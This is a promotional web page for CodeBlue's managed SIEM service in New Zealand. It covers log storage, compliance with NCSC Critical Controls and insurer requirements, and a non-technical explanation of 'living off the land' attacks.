As the complexity and sophistication of cyber threats increase, there is a need to evolve your defences to keep pace. Exploit techniques like “living off the land” demand new responses. These techniques are where attackers implant low footprint code or leverage native tools like PowerShell to snoop around your systems without attracting attention.
You may need to deploy solutions to combat these threats for a variety of reasons:
Do you have contractual commitments or cyber insurance requirements to store and analyse logs?
Is it a priority for your organisation to maintain a good cyber security posture?
Do your investors, government agencies, or financial/ healthcare regulations demand a robust SIEM service?
CodeBlue’s Security, Information and Event Monitoring (SIEM) service is designed to address cyber security challenges by providing comprehensive event logging and proactive threat detection.
Our service stores all logs, guaranteeing data integrity so that the information is ready for analysis and compliance when required. We use a sophisticated system of over 1,200 custom-developed rules, constantly updated to identify anomalies and potential threats, enabling detection of cyber attackers – especially those employing “living off the land” tactics.
To further enhance threat detection, the service integrates with local and global threat intelligence feeds, providing real-time insights into the latest security risks. Recognising that every business is unique, we also offer custom rule development, allowing us to adapt the system to your specific needs and requirements.
This managed service is monitored and maintained by CodeBlue, providing New Zealand organisations with peace of mind knowing their security is in expert hands.
At the heart of our SIEM solution are logging events from different systems, which store log data, making it available for real-time analysis. The CodeBlue SIEM platform – monitored by our SOC – uses these insights to proactively identify potential security threats that would be missed otherwise, enabling swift action to be taken and prevent breaches.
SIEM enables comprehensive visibility into your IT environment with detailed event logging and analysis. This enhances the ability of organisations to analyse stored data to gain insight into security events and trends.
By proactively storing all log activity, SIEM helps organisations meet regulatory compliance needs – especially for regulated industries. By storing data is a centralised location from the place it is generated – which means it cannot be overwritten or altered when an attacker gains access to the system – SIEM allows companies to supply any recorded log data when demanded.
Increasing numbers of cyber insurers require policy holders to provide access to all log data in the aftermath of a cyber incident. Their forensic investigators will need the data to establish what happened, why, and where liability lies. SIEM allows you to meet these conditions.
SIEM on its own won’t stop cyberattacks or data breaches, but it is a valuable tool as part of a multi-layered cybersecurity strategy. SIEM provides the capability at a granular level to monitor, analyse and prevent hostile activities within your networks – contributing to an overall reduction in risk.
The New Zealand National Cyber Security Centre (NCSC) defines a series of Critical Controls which are best practices to prevent, detect, or contain the majority of cyber attacks experienced by New Zealand businesses. Centralised Logging is one of these Critical Controls – a feature of CodeBlue SIEM – which will help your organisation to achieve adherence.
CodeBlue is a well-established IT Managed Service provider with over 20 years of experience helping New Zealand businesses overcome their technology challenges. As a wholly owned subsidiary of FUJIFILM Business Innovation, we offer the maturity, systems, processes, and brand of a major MSP, combined with a commitment to delivering exceptional service to Kiwi businesses.
We pride ourselves on the quality of our service, demonstrated by our average service desk call answer time of just 18 seconds and a customer satisfaction rating of 94% for ticket resolution. We currently serve a customer base of over 300 organisations, so you can trust our expertise and experience to deliver a SIEM solution that meets your specific needs.
At CodeBlue, we believe in building strong, long-term partnerships with our clients. That’s why we offer open-term agreements with only 90 days’ notice, giving you the flexibility and confidence you deserve.
A SIEM service keeps a log of every event recorded within your infrastructure – which means it will store a lot of data. As such, it is designed for those organisations who have prioritised proactive cyber security measures and need that level of insight and control.
Further, many organisations are increasingly guided by the National Cyber Security Centre’s Critical Controls, which define centralised logging as a critical control that organisations should set-up. SIEM features centralised logging as a core part of the solution, enabling organisations to adhere to that control.
Living off the land” exploits represent a sophisticated and insidious form of cyberattack where malicious actors leverage legitimate tools and features already present within a targeted system or network to carry out their objectives. Unlike traditional attacks that rely on introducing external malware, these techniques blend seamlessly into the environment, making them exceptionally difficult to detect.
Attackers employing this method might abuse common administrative tools like PowerShell in Windows environments or built-in scripting utilities to execute commands, move laterally across the network, and access sensitive data. By “living off the land,” they minimise their digital footprint, avoiding the introduction of suspicious files that security software would typically flag.
The danger of these exploits lies in their ability to evade conventional security measures. Because the actions are performed using trusted tools, they often go unnoticed within standard logging and monitoring systems. Detecting “living off the land” attacks requires advanced threat detection capabilities, such as those offered by CodeBlue’s SIEM service, which can identify anomalous patterns of activity and suspicious usage of legitimate tools.
